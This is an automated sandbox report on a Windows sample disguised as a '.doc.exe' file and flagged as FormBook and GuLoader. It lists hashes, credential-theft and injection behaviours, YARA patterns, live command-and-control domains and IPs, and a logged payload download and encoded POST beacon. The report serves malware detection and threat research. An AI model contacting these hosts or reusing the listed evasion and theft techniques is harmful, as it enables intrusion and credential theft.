Windows Analysis Report
List of Items0001.doc.exe

Overview

General Information

Sample name: List of Items0001.doc.exe
Analysis ID: 1516506
MD5: 6d3da95a3e1f5861a54c30dd61f80c02
SHA1: 74e6fb42c2de33b6b9dcd45aa86db1b99c8c2135
SHA256: 9c2d1e2dc9170158a8fef8393fd58306f918ceb15701465c4e21040be94233c2

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • List of Items0001.doc.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\List of Items0001.doc.exe" MD5: 6D3DA95A3E1F5861A54C30DD61F80C02)
    • List of Items0001.doc.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\List of Items0001.doc.exe" MD5: 6D3DA95A3E1F5861A54C30DD61F80C02)
      • MzAJhEkohQv.exe (PID: 3032 cmdline: "C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TapiUnattend.exe (PID: 1020 cmdline: "C:\Windows\SysWOW64\TapiUnattend.exe" MD5: D5BFFD755F566AAACB57CF83FDAA5CD0)
          • MzAJhEkohQv.exe (PID: 4076 cmdline: "C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7320 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
          • explorer.exe (PID: 4960 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2baf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2baf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

        System Summary

        Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Users\user\Desktop\List of Items0001.doc.exe", CommandLine: "C:\Users\user\Desktop\List of Items0001.doc.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\List of Items0001.doc.exe, NewProcessName: C:\Users\user\Desktop\List of Items0001.doc.exe, OriginalFileName: C:\Users\user\Desktop\List of Items0001.doc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4960, ProcessCommandLine: "C:\Users\user\Desktop\List of Items0001.doc.exe", ProcessId: 3452, ProcessName: List of Items0001.doc.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-09-24T11:25:42.306604+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49892 | 162.213.195.46 | 443 | TCP

        AV Detection

        Source: List of Items0001.doc.exe, Avira: detected
        Source: chalet-tofane.net, Virustotal: Detection: 8%
        Source: List of Items0001.doc.exe, Virustotal: Detection: 9%
        Source: List of Items0001.doc.exe, ReversingLabs: Detection: 13%
        Source: Yara match, File source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: List of Items0001.doc.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown, HTTPS traffic detected: 162.213.195.46:443 -> 192.168.11.30:49892 version: TLS 1.2
        Source: List of Items0001.doc.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: TapiUnattend.pdbGCTL source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MzAJhEkohQv.exe, 00000004.00000000.674131095770.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678885977938.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: List of Items0001.doc.exe, List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: TapiUnattend.pdb source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe, Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe, Code function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exe, Code function: 0_2_0040290B FindFirstFileW,0_2_0040290B

        Networking

        Source: DNS query: www.onetoph.xyz
        Source: DNS query: www.leadlikeyoumeanit.xyz
        Source: DNS query: www.moritynomxd.xyz
        Source: DNS query: www.inf30027group23.xyz
        Source: Joe Sandbox View, IP Address: 62.149.128.40
        Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.30:49892 -> 162.213.195.46:443
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown, UDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global traffic, HTTP traffic detected: GET /css/NxTelX253.bin HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: wamuk.org; Cache-Control: no-cache
        Source: unknownHTTP traffic detected: POST /opa3/ HTTP/1.1Host: www.wdcb30.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 200Origin: http://www.wdcb30.topReferer: http://www.wdcb30.top/opa3/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 6e 50 6d 57 6e 33 63 48 45 6c 38 58 47 41 50 70 58 48 78 72 58 47 70 4a 46 62 56 44 76 58 38 4e 76 4e 71 47 53 66 2f 4b 2b 2f 41 65 44 4b 63 56 33 6d 31 74 50 51 69 4e 31 35 49 4a 4c 5a 70 66 4e 59 48 66 4f 51 6d 5a 2b 54 58 54 63 55 75 67 73 4a 62 48 4b 30 65 42 46 47 4c 4e 59 79 32 4c 41 46 54 4f 6f 4b 68 46 6a 65 42 6e 67 4f 5a 6e 32 73 2f 58 79 73 5a 59 5a 39 6f 42 6b 43 71 48 70 73 69 59 5a 38 2f 64 59 65 42 4e 31 76 6f 59 37 70 67 51 52 38 79 45 64 5a 52 42 4e 44 58 37 48 66 6e 5a 46 79 58 34 4e 71 53 2b 74 48 42 64 56 6c 75 4a 77 3d 3d Data Ascii: 7LY=y9Ut54SIgwt80nPmWn3cHEl8XGAPpXHxrXGpJFbVDvX8NvNqGSf/K+/AeDKcV3m1tPQiN15IJLZpfNYHfOQmZ+TXTcUugsJbHK0eBFGLNYy2LAFTOoKhFjeBngOZn2s/XysZYZ9oBkCqHpsiYZ8/dYeBN1voY7pgQR8yEdZRBNDX7HfnZFyX4NqS+tHBdVluJw==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:26:37 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:26:43 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:26:45 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:26:48 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:26:51 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html; charset=utf-8
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:27:46 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:27:49 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:27:51 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:27:54 GMT
        Content-Type: text/html; charset=iso-8859-1
        Content-Length: 196
        Connection: close
        Vary: Accept-Encoding
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Connection: close
        x-litespeed-tag: 3da_HTTP.404
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        content-type: text/html; charset=UTF-8
        link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
        x-litespeed-cache-control: no-cache
        cache-control: no-cache, no-store, must-revalidate, max-age=0
        transfer-encoding: chunked
        content-encoding: br
        vary: Accept-Encoding
        date: Tue, 24 Sep 2024 09:28:10 GMT
        server: LiteSpeed
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Connection: close
        x-litespeed-tag: 3da_HTTP.404
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        content-type: text/html; charset=UTF-8
        link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
        x-litespeed-cache-control: no-cache
        cache-control: no-cache, no-store, must-revalidate, max-age=0
        transfer-encoding: chunked
        content-encoding: br
        vary: Accept-Encoding
        date: Tue, 24 Sep 2024 09:28:13 GMT
        server: LiteSpeed
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Connection: close
        x-litespeed-tag: 3da_HTTP.404
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        content-type: text/html; charset=UTF-8
        link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
        x-litespeed-cache-control: no-cache
        cache-control: no-cache, no-store, must-revalidate, max-age=0
        transfer-encoding: chunked
        content-encoding: br
        vary: Accept-Encoding
        date: Tue, 24 Sep 2024 09:28:16 GMT
        server: LiteSpeed
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private
        Content-Type: text/html; charset=utf-8
        Server: Microsoft-IIS/10.0
        X-Powered-By: ASP.NET
        Date: Tue, 24 Sep 2024 09:28:51 GMT
        Connection: close
        Content-Length: 4953
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private
        Content-Type: text/html; charset=utf-8
        Server: Microsoft-IIS/10.0
        X-Powered-By: ASP.NET
        Date: Tue, 24 Sep 2024 09:28:54 GMT
        Connection: close
        Content-Length: 4953
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private
        Content-Type: text/html; charset=utf-8
        Server: Microsoft-IIS/10.0
        X-Powered-By: ASP.NET
        Date: Tue, 24 Sep 2024 09:28:57 GMT
        Connection: close
        Content-Length: 4953
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private
        Content-Type: text/html; charset=utf-8
        Server: Microsoft-IIS/10.0
        X-Powered-By: ASP.NET
        Date: Tue, 24 Sep 2024 09:28:59 GMT
        Connection: close
        Content-Length: 5093
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:21 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:23 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:26 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:29 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:35 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66aa3fcf-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:38 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66aa3fcf-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:41 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66aa3fcf-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:44 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66aa3fcf-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:29:58 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66a7ebf9-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:30:01 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66a7ebf9-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:30:04 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66a7ebf9-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:30:07 GMT
        Content-Type: text/html
        Content-Length: 138
        Connection: close
        ETag: "66a7ebf9-8a"
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:30:12 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:30:15 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:30:17 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Tue, 24 Sep 2024 09:30:20 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 13928
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html; charset=utf-8
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:31:15 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 24 Sep 2024 09:31:18 GMT
        Content-Type: text/html; charset=iso-8859-1
        Transfer-Encoding: chunked
